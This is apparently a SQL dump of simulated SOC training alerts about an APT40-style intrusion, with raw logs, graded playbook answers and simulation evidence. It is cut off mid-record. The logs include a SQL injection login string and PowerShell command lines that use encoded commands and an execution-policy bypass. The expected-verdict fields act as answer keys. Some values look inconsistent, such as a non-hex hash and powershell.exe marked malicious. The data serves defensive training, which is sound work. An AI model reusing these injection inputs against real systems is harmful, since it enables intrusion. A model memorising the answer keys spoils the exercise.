'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(353, 'Execution of Custom Malware', 'high', 'Endpoint detection systems', 'APT40 executed a custom malware payload shortly after gaining access to the network. The malware is designed to operate stealthily, conducting reconnaissance and data collection.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"event_id\":\"EVT12345\",\"event_type\":\"execution\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"john_doe\",\"process_name\":\"custom_malware.exe\",\"process_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"command_line\":\"C:\\\\Users\\\\john_doe\\\\AppData\\\\Local\\\\Temp\\\\custom_malware.exe\",\"detection_method\":\"behavioral analysis\",\"additional_info\":{\"file_path\":\"C:\\\\Users\\\\john_doe\\\\AppData\\\\Local\\\\Temp\\\\custom_malware.exe\",\"network_activity\":[{\"ip_address\":\"203.0.113.45\",\"port\":443,\"protocol\":\"HTTPS\"}]}}', '2026-01-03 00:42:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known APT40 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as APT40 custom malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"custom_malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Custom malware filename used by APT40.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(354, 'Establishing Persistence via Web Shell', 'high', 'Web server logs', 'APT40 installed a web shell on the compromised server to ensure persistent access, even if initial access vectors are closed. The web shell was identified through unusual POST requests and the presence of a suspicious file on the server.', 'Persistence', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"request_method\":\"POST\",\"uri\":\"/uploads/shell.jsp\",\"http_version\":\"HTTP/1.1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"status_code\":200,\"response_size\":3452,\"referrer\":\"http://example.com/login\",\"file_hash\":\"1a79a4d60de6718e8e5b326e338ae533\",\"username\":\"admin\"}', '2026-01-03 00:42:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"The IP address is associated with known APT40 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"shell.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This file is recognized as a common web shell used by attackers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"1a79a4d60de6718e8e5b326e338ae533\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Bazaar\",\"verdict\":\"suspicious\",\"details\":\"The hash matches files used in recent APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common username for administrative access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.949Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"request_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"http_version\\\":\\\"HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":3452,\\\"referrer\\\":\\\"http://example.com/login\\\",\\\"file_hash\\\":\\\"1a79a4d60de6718e8e5b326e338ae533\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.949Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"request_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"http_version\\\":\\\"HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":3452,\\\"referrer\\\":\\\"http://example.com/login\\\",\\\"file_hash\\\":\\\"1a79a4d60de6718e8e5b326e338ae533\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.949Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"request_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"http_version\\\":\\\"HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":3452,\\\"referrer\\\":\\\"http://example.com/login\\\",\\\"file_hash\\\":\\\"1a79a4d60de6718e8e5b326e338ae533\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.949Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"request_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"http_version\\\":\\\"HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":3452,\\\"referrer\\\":\\\"http://example.com/login\\\",\\\"file_hash\\\":\\\"1a79a4d60de6718e8e5b326e338ae533\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.949Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"request_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"http_version\\\":\\\"HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":3452,\\\"referrer\\\":\\\"http://example.com/login\\\",\\\"file_hash\\\":\\\"1a79a4d60de6718e8e5b326e338ae533\\\",\\\"username\\\":\\\"admin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(355, 'Lateral Movement to Secure Data Sources', 'high', 'Network traffic analysis', 'The attackers used legitimate credentials obtained during the initial breach to navigate through the network, reaching sensitive research databases containing proprietary sonar technology schematics.', 'Lateral Movement', 'T1078', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"protocol\":\"RDP\",\"username\":\"j.doe\",\"event\":\"Successful login using compromised credentials\",\"file_accessed\":\"/network_share/sonar_schematics_v2.pdf\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"Access granted to sensitive data after lateral move\"}', '2026-01-03 00:42:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Research database server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Account used in unauthorized access\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"clean\",\"details\":\"No known issues with file hash\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(356, 'Exfiltration of Sonar Technology Schematics', 'high', 'Data loss prevention (DLP) systems', 'APT40 utilized encrypted channels to transfer the stolen sonar technology schematics to external servers, completing their data theft operation. The data exfiltration was detected by DLP systems monitoring outgoing traffic. The transfer was executed using the file \'sonar_tech_designs.zip\' over an encrypted connection to a known malicious IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:53:12Z\",\"source_ip\":\"10.0.10.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"sonar_tech_designs.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"transfer_size\":10485760,\"alert_trigger\":\"DLP Policy: Sensitive Data Exfiltration\",\"encryption\":\"TLSv1.2\"}', '2026-01-03 00:42:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT40 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"sonar_tech_designs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive sonar schematics.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in previous exfiltration attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"User account associated with current employee.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:53:12Z\\\",\\\"source_ip\\\":\\\"10.0.10.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"sonar_tech_designs.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"transfer_size\\\":10485760,\\\"alert_trigger\\\":\\\"DLP Policy: Sensitive Data Exfiltration\\\",\\\"encryption\\\":\\\"TLSv1.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:53:12Z\\\",\\\"source_ip\\\":\\\"10.0.10.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"sonar_tech_designs.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"transfer_size\\\":10485760,\\\"alert_trigger\\\":\\\"DLP Policy: Sensitive Data Exfiltration\\\",\\\"encryption\\\":\\\"TLSv1.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:53:12Z\\\",\\\"source_ip\\\":\\\"10.0.10.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"sonar_tech_designs.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"transfer_size\\\":10485760,\\\"alert_trigger\\\":\\\"DLP Policy: Sensitive Data Exfiltration\\\",\\\"encryption\\\":\\\"TLSv1.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:53:12Z\\\",\\\"source_ip\\\":\\\"10.0.10.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"sonar_tech_designs.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"transfer_size\\\":10485760,\\\"alert_trigger\\\":\\\"DLP Policy: Sensitive Data Exfiltration\\\",\\\"encryption\\\":\\\"TLSv1.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:53:12Z\\\",\\\"source_ip\\\":\\\"10.0.10.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"sonar_tech_designs.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"transfer_size\\\":10485760,\\\"alert_trigger\\\":\\\"DLP Policy: Sensitive Data Exfiltration\\\",\\\"encryption\\\":\\\"TLSv1.2\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(357, 'Suspicious Web Traffic Detected', 'high', 'Web Proxy Logs', 'A suspicious drive-by download was detected from a compromised ad network, which delivered an initial payload to an internal workstation, potentially leading to unauthorized access.', 'Drive-by Download', 'T1189: Drive-by Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:01Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"url\":\"http://malicious-ad-network.com/ads\",\"method\":\"GET\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"referrer\":\"http://trusted-news-portal.com\",\"filename\":\"exploit_kit.js\",\"hash\":\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\",\"username\":\"jdoe\"}', '2026-01-03 00:50:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-ad-network.com/ads\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Associated with malicious activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known exploit kit\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exploit_kit.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Identified as part of an exploit kit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.952Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:01Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"url\\\":\\\"http://malicious-ad-network.com/ads\\\",\\\"method\\\":\\\"GET\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://trusted-news-portal.com\\\",\\\"filename\\\":\\\"exploit_kit.js\\\",\\\"hash\\\":\\\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\\\",\\\"username\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.952Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:01Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"url\\\":\\\"http://malicious-ad-network.com/ads\\\",\\\"method\\\":\\\"GET\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://trusted-news-portal.com\\\",\\\"filename\\\":\\\"exploit_kit.js\\\",\\\"hash\\\":\\\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\\\",\\\"username\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.952Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:01Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"url\\\":\\\"http://malicious-ad-network.com/ads\\\",\\\"method\\\":\\\"GET\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://trusted-news-portal.com\\\",\\\"filename\\\":\\\"exploit_kit.js\\\",\\\"hash\\\":\\\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\\\",\\\"username\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.952Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:01Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"url\\\":\\\"http://malicious-ad-network.com/ads\\\",\\\"method\\\":\\\"GET\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://trusted-news-portal.com\\\",\\\"filename\\\":\\\"exploit_kit.js\\\",\\\"hash\\\":\\\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\\\",\\\"username\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.952Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:01Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"url\\\":\\\"http://malicious-ad-network.com/ads\\\",\\\"method\\\":\\\"GET\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://trusted-news-portal.com\\\",\\\"filename\\\":\\\"exploit_kit.js\\\",\\\"hash\\\":\\\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\\\",\\\"username\\\":\\\"jdoe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(358, 'Malicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'A PowerShell script is executed on the infected system, establishing a foothold within the network and allowing further payloads to be delivered.', 'PowerShell Script', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"event_type\":\"process_creation\",\"computer_name\":\"WIN-0A1B2C3D4E5F\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\Documents\\\\malicious_payload.ps1\",\"file_hash\":\"d4c3b2a1e5f6g7h8i9j0k1l2m3n4o5p6\",\"internal_ip\":\"192.168.1.100\",\"external_ip\":\"203.0.113.45\",\"related_domain\":\"malicious-apt.com\"}', '2026-01-03 00:50:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious script used by APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d4c3b2a1e5f6g7h8i9j0k1l2m3n4o5p6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious PowerShell scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User with administrative 